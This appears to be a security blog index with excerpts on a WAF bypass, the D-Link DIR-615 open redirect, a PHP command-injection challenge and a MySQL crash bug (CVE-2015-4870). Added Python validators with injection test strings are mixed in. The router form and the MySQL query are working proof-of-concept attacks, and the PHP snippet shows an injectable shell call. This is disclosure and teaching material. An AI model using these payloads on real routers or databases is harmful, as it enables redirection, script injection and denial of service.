Bypassing the WebARX Web Application Firewall (WAF)

WebARX is a web application firewall that protects websites from malicious requests. It was covered by TheHackerNews as well and gets good ratings if you do some Googling:
https://thehackernews.com/2019/09/webarx-web-application-security.html

It turned out that the WebARX WAF could be easily bypassed by including a whitelisted string in the request: if the WAF detects a whitelisted string, it does not process (inspect) the request at all.

Let’s first try it on their own website. This is a simple LFI payload.


(more…)


Beagle – Find vulnerabilities in your websites easily

I came across a new scanner named Beagle. This scanner really crawls fast compared to the other scanners I have experienced. It’s faster in detecting vulnerabilities, and it takes less CPU power.

An example of how vulnerabilities are reported; you can choose different output formats. For example, this one is in PDF. Check here for sample reports generated by Beagle.

Features

(more…)

D-Link DIR-615 Open Redirection and XSS

D-Link DIR-615
Hardware Version: E3
Firmware Version: 5.10

The ‘apply.cgi’ file was vulnerable to Open Redirection and XSS. Many other CGI files inside the router, for example ‘ping_response.cgi’, use this same functionality in ‘apply.cgi’.

Open Redirection

apply.cgi

<html>
<!-- @OsandaMalith -->
  <body>
    <form action="http://192.168.0.1/apply.cgi" method="POST" id="exploit">
      <input type="hidden" name="html_response_page" value="https://google.lk" />
      <input type="hidden" name="html_response_return_page" value="tools_vct.asp" />
      <img src=x onerror="exploit.submit()"/>
    </form>
  </body>
</html>
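The root cause shown by the PoC is that apply.cgi takes the page to redirect to from the html_response_page / html_response_return_page parameters and uses it unvalidated, so an absolute URL leaves the device and a crafted value is reflected into the response. As an added example (mine, not from the original post or from D-Link’s firmware), here is the defender’s side in Python: a validator that only lets a bare in-device page name such as tools_vct.asp through and falls back to a default otherwise. The parameter names come from the PoC above; the allow-list grammar (page names ending in .asp/.htm/.html, optionally with a simple query string) and the DEFAULT_PAGE fallback are assumptions about what the firmware legitimately needs.

```python
import re
from urllib.parse import urlsplit

# Assumed grammar for a legitimate in-device page name, e.g. "tools_vct.asp".
# Letters, digits, '_' and '-' only; the character set also excludes < > " '
# so an accepted value is safe to reflect into an HTML attribute.
PAGE_NAME_RE = re.compile(r"[A-Za-z0-9_\-]+\.(?:asp|htm|html)(?:\?[A-Za-z0-9_=&%\-]*)?")

DEFAULT_PAGE = "index.asp"  # placeholder fallback, not a value taken from the page


def is_safe_local_page(target: str) -> bool:
    """True only for a relative, same-device page name with no scheme, host or path."""
    if not target or len(target) > 255:
        return False
    # CR/LF/NUL could smuggle headers; some browsers treat backslash as '/'
    if any(ch in target for ch in "\\\r\n\x00"):
        return False
    parts = urlsplit(target)
    if parts.scheme or parts.netloc:      # rejects https://host, //host, javascript:
        return False
    if "/" in target:                     # rejects absolute paths and ../ traversal
        return False
    return PAGE_NAME_RE.fullmatch(target) is not None


def vulnerable_resolve(requested: str) -> str:
    """The pattern apply.cgi effectively implements: trust the parameter as-is."""
    return requested


def resolve_response_page(requested: str) -> str:
    """Hardened: use the requested page only if it passes the allow-list check."""
    return requested if is_safe_local_page(requested) else DEFAULT_PAGE


if __name__ == "__main__":
    # Values constructed for the demo; the first two are the ones in the PoC form.
    for value in ("tools_vct.asp", "https://google.lk", "//google.lk/x.asp",
                  "javascript:alert(1)", 'x.asp"><script>', "../admin.asp"):
        print(f"{value!r:28} vulnerable -> {vulnerable_resolve(value)!r:28} "
              f"hardened -> {resolve_response_page(value)!r}")
```

The check deliberately avoids trying to "fix" a bad value (stripping a scheme, decoding, and so on); anything that is not a plain page name is replaced by the default, which is the only behaviour that is easy to reason about.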

(more…)

PHP Feature or 0day?

Today one of my friends @RakeshMane10 gave me a challenge which I found pretty interesting.

<?php
ini_set('error_displays', 0);
$ip = htmlspecialchars($_GET['url'], ENT_QUOTES);
$f = fsockopen($ip, 80, $errno, $errstr, 5);
if($f) {
    $result = shell_exec('ping -c 1 ' . $ip);
    echo '<div class="alert alert-success">' . nl2br($result) . '</div>';
} else {
    echo '<div class="alert alert-danger">' . $errstr . '</div>';
}
?>
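Whatever the intended answer to the challenge, the risky pattern in that snippet is structural: htmlspecialchars() only makes the value safe to print into HTML, not to concatenate into a shell command, and a successful fsockopen() only proves that something answered on port 80, not that the string is shell-safe. As an added example (mine, not from the challenge or from @RakeshMane10), here is the same ping utility in Python with the input handling hardened: the target must be an IP literal or a syntactically valid hostname, and it is passed to ping as a separate argv element so no shell ever parses it. It assumes a ping binary that accepts -c 1.

```python
import ipaddress
import re
import subprocess

# RFC 1123-style hostname: 1-63 alphanumeric/hyphen characters per label, no
# leading or trailing hyphen, at most 253 characters overall. Shell metacharacters
# (; | & $ ` space, quotes) cannot match this grammar at all.
HOSTNAME_RE = re.compile(
    r"(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
    r"(?:\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*\.?"
)


def is_valid_ping_target(value: str) -> bool:
    """Allow-list check: an IPv4/IPv6 literal or a syntactically valid hostname."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        pass
    return HOSTNAME_RE.fullmatch(value) is not None


def build_ping_argv(target: str) -> list:
    """Build argv as a list; the value is never interpreted by a shell.
    A leading '-' is impossible here, so it cannot be mistaken for an option either."""
    if not is_valid_ping_target(target):
        raise ValueError("refusing to ping: not an IP address or hostname")
    return ["ping", "-c", "1", target]


def ping(target: str, timeout: float = 5.0) -> str:
    """Run ping without a shell. Escape the *output* when rendering it as HTML,
    instead of escaping the input and hoping that also protects the command line."""
    completed = subprocess.run(build_ping_argv(target), capture_output=True,
                               text=True, timeout=timeout)
    return completed.stdout or completed.stderr


if __name__ == "__main__":
    # Constructed sample inputs: the last four are the kind a validator must reject.
    for value in ("127.0.0.1", "example.com", "::1",
                  "127.0.0.1; id", "google.com -c 5", "$(id)", "-c"):
        print(f"{value!r:20} -> {'accepted' if is_valid_ping_target(value) else 'rejected'}")
```

The two changes are independent and both matter: the allow-list stops hostile strings from reaching the command at all, and the argv list means that even a future relaxation of the grammar cannot turn into a shell injection.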

(more…)

MySQL DoS in the Procedure Analyse Function – CVE-2015-4870

This is a crash I found in MySQL versions up to 5.5.45. I found it in the function procedure analyse() while passing a subquery.

Syntax:

SELECT * FROM `table_name` PROCEDURE ANALYSE((SELECT*FROM(SELECT 1)x),1);

So an example PoC would be:

select * from information_schema.tables procedure analyse((select*from(select 1)x),1);

---------------------------------------------------------------------------------------------------------------
mysql> select * from information_schema.tables procedure analyse((select*from(select 1)x),1);
ERROR 2013 (HY000): Lost connection to MySQL server during query
mysql>
mysql> select 1;
ERROR 2006 (HY000): MySQL server has gone away
No connection. Trying to reconnect...
ERROR 2003 (HY000): Can't connect to MySQL server on 'localhost' (10061)
ERROR:
Can't connect to the server

mysql>
---------------------------------------------------------------------------------------------------------------


(more…)